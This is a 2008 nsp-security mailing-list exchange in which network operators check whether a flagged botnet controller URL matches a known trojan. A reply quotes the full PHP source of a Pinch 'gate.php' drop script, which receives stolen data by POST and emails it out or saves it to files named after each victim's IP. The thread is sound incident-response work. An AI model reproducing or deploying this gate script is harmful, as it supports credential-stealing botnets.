[nsp-sec] 212.43.241.106 in the daily reports

David Freedman david.freedman at uk.clara.net
Mon Feb 25 10:16:18 EST 2008 

Tom, see attached diff:


Tom Fischer wrote:
> Hi,
>
> On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
>> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
>> the URL http://www.winfleet.fr/fr/gate.php,
>
> does this gate.php look like the attached Pinch gate.php?
>
>
>
> ------------------------------------------------------------------------
>
> <?
> //CFG
> $mode = 1; 		//1.Send to e-mail, 2.Save to file, 3.E-mail+file
> $rndatch = FALSE;	//Random reports names
> $savetodir = TRUE;	//Save rerorts to changed directory	
> $dirname = "load";	//Directory name
>
> // a - recepient
> // b - subject
> // c - message body
> // d - file name(not *.php)
>
> //Getting data
> $ip=getenv("REMOTE_ADDR");
> $email=$_POST['a'];
> $subject=$_POST['b']."(".$ip.")";
> $msg = str_replace(" ","+",$_POST['c']);
> $var = $_POST['d'];
>
>
> //Storing || Sending data
> //via E-Mail
> IF($mode == 1 || $mode == 3){
>
>   IF($rndatch){
>     $array = range('a','z');
>     $c=count($array);
>     $var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
>   };
>
>   $headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
>   $headers.= "Content-Transfer-Encoding: base64\n";
>   $headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
>   mail($email, $subject, $msg, $headers);
> };
>
> //via File
> IF($mode == 2 || $mode == 3){
>
> //To dir
>  IF($savetodir){
>  // @mkdir($dirname);
>   @chdir($dirname);
>  }
>
>   //$vartype=substr($var,-3,3);
>  // IF($vartype == "php")
>  $var.=".rep";
>
>    $filename = $ip.".php";
>
>   $fp=fopen($filename,'w');
>   fwrite($fp, base64_decode($msg));
>   fclose($fp);
> };
> ?>
>
> <title>ret_ok</title>


--
David Freedman
Group Network Engineering
Claranet Limited
http://www.clara.net
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: gate.diff.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20080225/ed7f056f/attachment-0001.txt>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 254 bytes
Desc: OpenPGP digital signature
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20080225/ed7f056f/attachment-0001.sig>

More information about the nsp-security mailing list